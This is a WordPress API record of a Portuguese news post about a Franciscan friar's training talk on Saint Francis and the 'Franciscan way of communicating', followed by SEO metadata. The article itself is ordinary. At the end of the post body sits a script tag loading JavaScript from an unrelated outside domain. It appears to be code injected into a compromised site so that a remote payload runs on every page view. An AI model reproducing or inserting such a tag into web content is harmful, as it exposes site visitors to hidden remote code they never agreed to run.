{"id":168502,"date":"2018-08-08T18:57:23","date_gmt":"2018-08-08T21:57:23","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=168502"},"modified":"2020-06-07T08:38:33","modified_gmt":"2020-06-07T11:38:33","slug":"frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html","title":{"rendered":"Frei Medella e o jeito franciscano de comunicar"},"content":{"rendered":"<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/08\/frente_080818_1.jpg\" alt=\"frente_080818_1\" width=\"830\" height=\"357\" \/><\/p>\n<p><strong>Moacir Beggo<\/strong><\/p>\n<p><strong>S\u00e3o Paulo (SP)<\/strong> &#8211; Uma tarde franciscana. Foi assim o 7\u00ba encontro do Programa de Forma\u00e7\u00e3o Permanente da Frente de Evangeliza\u00e7\u00e3o da Comunica\u00e7\u00e3o nesta quarta-feira, 8 de agosto. Atrav\u00e9s do tema \u201cA Comunica\u00e7\u00e3o de Francisco\u201d, Frei Gustavo Medella, coordenador da Frente da Comunica\u00e7\u00e3o, conduziu a reflex\u00e3o por videoconfer\u00eancia com os colaboradores do Col\u00e9gio Bom Jesus e FAE, de Curitiba (PR); Funda\u00e7\u00e3o Frei Rog\u00e9rio, de Curitibanos (SC); Funda\u00e7\u00e3o Celinauta, de Pato Branco (PR); Universidade S\u00e3o Francisco, de Bragan\u00e7a Paulista (SP); Servi\u00e7o Franciscano de Solidariedade &#8211; Sefras (SP) e da Sede Provincial (SP).<\/p>\n<p>Para Frei Gustavo, este momento formativo teve como proposta identificar elementos da vida, dos ensinamentos de S\u00e3o Francisco que possam nortear a &#8220;nossa comunica\u00e7\u00e3o&#8221; enquanto comunidades ligadas ao modo franciscano.<\/p>\n<p>Primeiro, observa o frade, \u00e9 preciso entendermos a comunica\u00e7\u00e3o como possibilidade de encontro, como rela\u00e7\u00e3o e como &#8220;constru\u00e7\u00e3o de pontes&#8221;, express\u00e3o que o Papa Francisco gosta muito de usar. &#8220;N\u00f3s podemos nos inspirar em diversos encontros durante a vida de Francisco, mas aqui vamos nos ater especialmente a dois: o chamado encontro de Francisco com Cristo, que lhe falou no Crucifixo de S\u00e3o Dami\u00e3o, e o abra\u00e7o ao leproso&#8221;, adiantou.<\/p>\n<p>&#8220;No primeiro, Francisco em ora\u00e7\u00e3o diante do Crucifixo foi capaz de ouvir os apelos que Cristo lhe fez. Tamb\u00e9m podemos ouvir os apelos de nossa realidade. De que maneira temos elementos, maneiras para ouvir os apelos que nossa realidade nos faz?&#8221;, questionou o frade. &#8220;N\u00f3s sabemos que o bom comunicador \u00e9 necessariamente tamb\u00e9m um bom ouvinte. Ouvinte no sentido de algu\u00e9m que busca compreender, receber, elaborar e dar significado aos sinais da realidade e, a partir desses sinais, orientar sua pr\u00e1tica, orientar inclusive o conte\u00fado da sua comunica\u00e7\u00e3o. Nossos ouvidos est\u00e3o treinados para identificar os apelos que nos chegam?&#8221;, refor\u00e7ou.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/08\/frente_080818_2.jpg\" alt=\"frente_080818_2\" width=\"830\" height=\"437\" \/><\/p>\n<p style=\"text-align: center;\"><em>Profissionais da Funda\u00e7\u00e3o Frei Rog\u00e9rio de Curitibanos (SC)<\/em><\/p>\n<p>No segundo exemplo, Frei Medella explicou antes o que significava ser leproso no contexto da Idade M\u00e9dia. &#8220;Primeiro era uma doen\u00e7a que n\u00e3o tinha cura. Hoje temos tratamentos e profilaxias para a chamada hansen\u00edase. Mas naquele tempo, a lepra de fato degenerava a pessoa, que apodrecia em vida. Uma vez acometida por essa enfermidade, ela era totalmente isolada do conv\u00edvio social. As pessoas portadoras dessa doen\u00e7a viviam fora do contexto da cidade, viviam nas florestas, \u00e0 margem da sociedade e abandonadas. Suas feridas cheiravam mal e elas n\u00e3o tinham meios de subsist\u00eancia, de higiene. Ent\u00e3o, eram figuras que causavam repulsa. Inclusive em Francisco. No entanto, no seu processo de convers\u00e3o, ele foi capaz de vencer esse nojo, esse asco em rela\u00e7\u00e3o \u00e0 figura do leproso e, motivado por um ideal maior, depois de perceber que aquele leproso podia ser a figura do Cristo que sofreu na cruz e que continua sofrendo na figura das pessoas mais desamparadas, foi capaz de abra\u00e7ar e beijar aquele leproso e se colocou no meio dos leprosos. E, a partir desse momento, ele descreve no seu Testamento assim: &#8216;Depois daquele gesto, o que era amargo para mim se tornou doce&#8217;. O leproso n\u00e3o deixou de cheirar mal, n\u00e3o deixou de ser aquela figura, mas Francisco conseguiu dar esse passo. Conseguiu ir ao encontro e perceber, naquele ser humano, um filho amado de Deus, digno de sua aten\u00e7\u00e3o, de seu carinho e da sua solidariedade&#8221;, situou, fazendo novos questionamentos: Como expressamos em nossa comunica\u00e7\u00e3o o compromisso com os \u00faltimos de nosso tempo? Quem s\u00e3o os leprosos de hoje? E de que maneira eles s\u00e3o atendidos, s\u00e3o contemplados em nossa comunica\u00e7\u00e3o, seja pelos meios tradicionais de r\u00e1dio e televis\u00e3o, seja em nossas a\u00e7\u00f5es comunicativas em nossas diferentes presen\u00e7as, em outras entidades, e na vida da educa\u00e7\u00e3o?<\/p>\n<p>Frei Gustavo, num segundo momento, questionou o que se pretende transmitir nos telejornais e programas, na internet ou redes sociais? Francisco vivia em comunica\u00e7\u00e3o \u00edntima com Deus e, j\u00e1 em vida, tornou-se capaz de comunicar, \u00e0queles que com ele estavam, a presen\u00e7a viva do Senhor pois, conforme descreve um de seus bi\u00f3grafos, \u201ctrazia Jesus no cora\u00e7\u00e3o, na boca, nos ouvidos, nos olhos, nas m\u00e3os, nos sentimentos e em todos os demais membros (cf. I Cel 9,115)\u201d.<\/p>\n<p>Depois, falando do texto de S\u00e3o Francisco no qual ele faz uma sauda\u00e7\u00e3o \u00e0s diferentes virtudes, entre elas a sabedoria, a simplicidade, a pobreza, a humildade, a caridade e a obedi\u00eancia, lembrou que elas n\u00e3o s\u00e3o apenas ideias abstratas, mas tomam corpo \u00e0 medida que se encarnam em hist\u00f3rias reais de pessoais reais. &#8220;Temos procurado privilegiar a hist\u00f3ria e o exemplo de pessoas virtuosas que se destacam pela ousadia, pelo entusiasmo, pela generosidade e pelo desprendimento? Onde e como podemos encontrar tais pessoas?&#8221;, emendou.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/08\/frente_080818_3.jpg\" alt=\"frente_080818_3\" width=\"830\" height=\"487\" \/><\/p>\n<p style=\"text-align: center;\"><em>Mar\u00edlia, Marina e Juliano, profissionais do Col\u00e9gio Bom Jesus e FAE (PR)<\/em><\/p>\n<p>Juliano Zemuner, da equipe de comunica\u00e7\u00e3o do Bom Jesus, lembrou um exemplo no Col\u00e9gio Bom Jesus de Vacaria (RS), onde um professor, ao falar sobre S\u00e3o Francisco de Assis aos alunos, \u00a0promoveu uma a\u00e7\u00e3o comunit\u00e1ria, que cresceu e se expandiu al\u00e9m do campo educacional. J\u00e1 Ari Ign\u00e1cio de Lima, coordenador de Jornalismo TV Sudoeste, contou que recentemente fez uma reportagem num assentamento de \u201csem terras&#8221;, em Mangueirinha (PR), onde h\u00e1 26 anos tinha registrado o come\u00e7o do trabalho para a forma\u00e7\u00e3o da nova comunidade.\u00a0 &#8220;Hoje ela \u00e9 organizada, com fam\u00edlias estruturadas, filhos na universidade ou j\u00e1 formados, at\u00e9 m\u00e9dicos j\u00e1 sa\u00edram de l\u00e1&#8230;.. Uma reportagem que me realizou como profissional e que vem ao encontro da nossa miss\u00e3o de promover boas pr\u00e1ticas.\u00a0 Como eu gostaria de ter uma dessas por dia&#8230;&#8221;, desejou o comunicador.<\/p>\n<p>Dentro dessa sintonia com o fundador da Ordem Franciscana, Frei Medella tamb\u00e9m abordou o compromisso com a ecologia, o cuidado do meio ambiente, a cultura da paz e tamb\u00e9m da promo\u00e7\u00e3o do di\u00e1logo. &#8220;Francisco possu\u00eda uma incr\u00edvel habilidade de dialogar e promover o di\u00e1logo&#8221;, lembrou o frade. &#8220;Como nossa comunica\u00e7\u00e3o tem contribu\u00eddo para a constru\u00e7\u00e3o da paz no tr\u00e2nsito, nas fam\u00edlias, nos ambientes de trabalho, etc?&#8221;, perguntou Frei Medella. Ana Paula Moreira, jornalista da Universidade S\u00e3o Francisco, lembrou as atividades da USF com a comunidade, destacando a VII Semana Jur\u00eddica sobre os 70 Anos da Declara\u00e7\u00e3o Universal dos Direitos Humanos, sobre o tema \u201cO Direito de todas as faces. As faces do Direito&#8221;, que ser\u00e1 realizada no Campus Itatiba, de 22 a 23 de agosto, das 09h30 \u00e0s 11h, e no per\u00edodo noturno e de 21 a 24 de agosto, das 19h30 \u00e0s 22h.<\/p>\n<p>Frei Medella frisou a import\u00e2ncia de discutir a quest\u00e3o dos direitos humanos, exatamente quando a sociedade brasileira dissemina discursos de \u00f3dio, preconceito e viol\u00eancia. &#8220;A nossa evangeliza\u00e7\u00e3o n\u00e3o pode passar ao largo. Nosso exerc\u00edcio profissional de comunidades franciscanas n\u00e3o pode desconsiderar o tema. No caso, se n\u00f3s nos fechamos ou n\u00e3o damos aten\u00e7\u00e3o a esse tipo de tem\u00e1tica, n\u00e3o estamos fazendo como Francisco que soube ouvir o Crucifixo de S\u00e3o Dami\u00e3o e, de certa maneira, estamos nos tornando at\u00e9 indiferentes aos apelos que a vida nos apresenta&#8221;, completou o frade.<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Frente da Comunica\u00e7\u00e3o<\/p>\n","protected":false},"author":1,"featured_media":209979,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[497,550],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Frei Medella e o jeito franciscano de comunicar - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Frei Medella e o jeito franciscano de comunicar - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Frente da Comunica\u00e7\u00e3o\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-08-08T21:57:23+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-06-07T11:38:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/08\/frente_080818_1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/08\/frente_080818_1.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/08\/frente_080818_1.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html\",\"name\":\"Frei Medella e o jeito franciscano de comunicar - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html#primaryimage\"},\"datePublished\":\"2018-08-08T21:57:23+00:00\",\"dateModified\":\"2020-06-07T11:38:33+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Frei Medella e o jeito franciscano de comunicar\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Frei Medella e o jeito franciscano de comunicar - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html","og_locale":"pt_BR","og_type":"article","og_title":"Frei Medella e o jeito franciscano de comunicar - Not\u00edcias - Franciscanos","og_description":"Frente da Comunica\u00e7\u00e3o","og_url":"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-08-08T21:57:23+00:00","article_modified_time":"2020-06-07T11:38:33+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/08\/frente_080818_1.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"6 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/08\/frente_080818_1.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/08\/frente_080818_1.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html","name":"Frei Medella e o jeito franciscano de comunicar - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html#primaryimage"},"datePublished":"2018-08-08T21:57:23+00:00","dateModified":"2020-06-07T11:38:33+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/frei-medella-fala-sobre-o-jeito-franciscano-de-comunicar.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Frei Medella e o jeito franciscano de comunicar"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/168502"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=168502"}],"version-history":[{"count":1,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/168502\/revisions"}],"predecessor-version":[{"id":224886,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/168502\/revisions\/224886"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/209979"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=168502"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=168502"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=168502"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}